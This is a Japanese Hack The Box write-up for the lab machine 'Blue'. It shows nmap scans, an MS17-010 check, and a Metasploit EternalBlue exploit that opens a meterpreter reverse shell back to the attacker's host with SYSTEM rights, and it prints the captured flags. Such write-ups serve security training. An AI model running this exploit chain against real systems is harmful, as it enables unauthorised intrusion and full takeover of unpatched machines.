[HTB Writeup] Blue

2 min read

[HTB Writeup] Blue

CAUTION

この記事は合法的なペネトレーションテスト環境(Hack The Box)での攻略内容です。許可のないシステムへの攻撃は違法です。

Overview

Blue は Windows マシンです。名前の通り、EternalBlue (MS17-010) の脆弱性を利用して攻略します。

  • OS: Windows Server 2008 R2 SP1
  • Difficulty: Easy
  • Key Topics: MS17-010 (EternalBlue), SMB

Enumeration

Nmap

全ポートをスキャンします。

Terminal window
┌──(kali㉿kali)-[~/htb/blue.htb]
└─$ mkdir nmap


┌──(kali㉿kali)-[~/htb/blue.htb]
└─$ nmap -Pn -p- --min-rate=3000 -T4 -oA nmap/allports 10.129.236.190
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-04 10:43 -0500
Warning: 10.129.236.190 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.236.190
Host is up (2.7s latency).
Not shown: 64903 closed tcp ports (reset), 623 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown


Nmap done: 1 IP address (1 host up) scanned in 96.78 seconds

次に、これらポートに対して、詳細なスキャンを行います。

クリックで展開
Terminal window
┌──(kali㉿kali)-[~/htb/blue.htb]
└─$ grep -oP '\d+/open' nmap/allports.gnmap | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//'
135,139,445,49152,49153,49154,49155,49156,49157
┌──(kali㉿kali)-[~/htb/blue.htb]
└─$ nmap -Pn -p135,139,445,49152,49153,49154,49155,49156,49157 -sC -sV -oA nmap/detailed 10.129.236.190
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-04 10:48 -0500
Nmap scan report for 10.129.236.190
Host is up (0.18s latency).


PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:
|_clock-skew: mean: 4s, deviation: 3s, median: 2s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2026-03-04T15:49:24+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2026-03-04T15:49:20
|_  start_date: 2026-03-04T15:36:29


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.29 seconds

スキャンから、以下の情報が得られました。

  • SMB サービスが稼働している
  • OS は Windows 7 Professional 7601 Service Pack 1
  • SMB のセキュリティモードは、メッセージ署名が無効である

相当有名な脆弱性なので知っている人も多いと思いますが、この条件に一致する脆弱性は MS17-010 (EternalBlue) です。

(マシン名の “Blue” も、EternalBlue を示唆していると思われます。)

SMB Vulnerability Scan

まずは、脆弱性を確認するために、SMB の脆弱性スキャンを行います。

Terminal window
┌──(kali㉿kali)-[~/htb/blue.htb]
└─$ nmap -p 445 --script smb-vuln-ms17-010 10.129.236.190
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-04 10:53 -0500
Nmap scan report for 10.129.236.190
Host is up (0.17s latency).


PORT    STATE SERVICE
445/tcp open  microsoft-ds


Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/


Nmap done: 1 IP address (1 host up) scanned in 2.79 seconds

スキャンの結果、MS17-010 (EternalBlue) の脆弱性が存在することが確認できました。

Exploitation

MS17-010 (EternalBlue)

Metasploit のモジュールを確認します。

クリックで展開
Terminal window
┌──(kali㉿kali)-[~/htb/blue.htb]
└─$ msfconsole -q
msf > search ms17-010


Matching Modules
================


   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)             .                .        .      .
   29    \_ target: Neutralize implant                .                .        .      .




Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'


msf >

今回は0番 (ms17_010_eternalblue) を使用してみます。

クリックで展開
Terminal window
msf > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > show options


Module options (exploit/windows/smb/ms17_010_eternalblue):


   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/u
                                             sing-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. O
                                             nly affects Windows Server 2008 R2, Windows 7, Windows Emb
                                             edded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only
                                             affects Windows Server 2008 R2, Windows 7, Windows Embedde
                                             d Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Wi
                                             ndows Server 2008 R2, Windows 7, Windows Embedded Standard
                                              7 target machines.




Payload options (windows/x64/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.93.128   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port




Exploit target:


   Id  Name
   --  ----
   0   Automatic Target






View the full module info with the info, or info -d command.


msf exploit(windows/smb/ms17_010_eternalblue) >

RHOSTS と LHOST を設定して、攻撃を実行します。

クリックで展開
Terminal window
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.129.236.190
RHOSTS => 10.129.236.190
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => 10.10.16.34
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.16.34:4444
[*] 10.129.236.190:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.236.190:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.25/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 10.129.236.190:445    - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.236.190:445 - The target is vulnerable.
[*] 10.129.236.190:445 - Connecting to target for exploitation.
[+] 10.129.236.190:445 - Connection established for exploitation.
[+] 10.129.236.190:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.236.190:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.236.190:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.129.236.190:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.129.236.190:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.129.236.190:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.236.190:445 - Trying exploit with 12 Groom Allocations.
[*] 10.129.236.190:445 - Sending all but last fragment of exploit packet
[*] 10.129.236.190:445 - Starting non-paged pool grooming
[+] 10.129.236.190:445 - Sending SMBv2 buffers
[+] 10.129.236.190:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.236.190:445 - Sending final SMBv2 buffers.
[*] 10.129.236.190:445 - Sending last fragment of exploit packet!
[*] 10.129.236.190:445 - Receiving response from exploit packet
[+] 10.129.236.190:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.236.190:445 - Sending egg to corrupted connection.
[*] 10.129.236.190:445 - Triggering free of corrupted buffer.
[-] 10.129.236.190:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.236.190:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.236.190:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.129.236.190:445 - Connecting to target for exploitation.
[+] 10.129.236.190:445 - Connection established for exploitation.
[+] 10.129.236.190:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.236.190:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.236.190:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.129.236.190:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.129.236.190:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.129.236.190:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.236.190:445 - Trying exploit with 17 Groom Allocations.
[*] 10.129.236.190:445 - Sending all but last fragment of exploit packet
[*] 10.129.236.190:445 - Starting non-paged pool grooming
[+] 10.129.236.190:445 - Sending SMBv2 buffers
[+] 10.129.236.190:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.236.190:445 - Sending final SMBv2 buffers.
[*] 10.129.236.190:445 - Sending last fragment of exploit packet!
[*] 10.129.236.190:445 - Receiving response from exploit packet
[+] 10.129.236.190:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.236.190:445 - Sending egg to corrupted connection.
[*] 10.129.236.190:445 - Triggering free of corrupted buffer.
[*] Sending stage (232006 bytes) to 10.129.236.190
[*] Meterpreter session 1 opened (10.10.16.34:4444 -> 10.129.236.190:49158) at 2026-03-04 11:00:39 -0500
[+] 10.129.236.190:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.236.190:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.236.190:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


meterpreter >

1回目の試行は失敗しましたが、2回目の試行で成功し、Meterpreter セッションを獲得できました。

権限を確認します。

Terminal window
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : HARIS-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

NT AUTHORITY\SYSTEM。既に最高権限ですね🎉

Flags

user.txtroot.txt を確認します。

Terminal window
meterpreter > search -f user.txt
Found 1 result...
=================


Path                             Size (bytes)  Modified (UTC)
----                             ------------  --------------
c:\Users\haris\Desktop\user.txt  34            2026-03-04 10:37:14 -0500


meterpreter > cat "c:\Users\haris\Desktop\user.txt"
ea7adcb058daef3adf4e894b998fe010
meterpreter > search -f root.txt
Found 1 result...
=================


Path                                     Size (bytes)  Modified (UTC)
----                                     ------------  --------------
c:\Users\Administrator\Desktop\root.txt  34            2026-03-04 10:37:14 -0500


meterpreter > cat "c:\Users\Administrator\Desktop\root.txt"
65d0bc430bfe2b84c0a28d6983c77076
meterpreter >

user.txtroot.txt の両方を取得できました。

まとめ

Blue は EternalBlue (MS17-010) を利用するだけの非常にシンプルなマシンでした。

  1. Nmap で SMB が稼働する Windows 7 SP1 を確認
  2. NSE スクリプト (smb-vuln-ms17-010) で MS17-010 の脆弱性を確認
  3. Metasploit (ms17_010_eternalblue) で SYSTEM 権限のシェルを取得

EternalBlue はカーネルレベルのエクスプロイトのため、成功すれば一発で SYSTEM 権限が取れます。Privilege Escalation が不要なパターンでした。

関連記事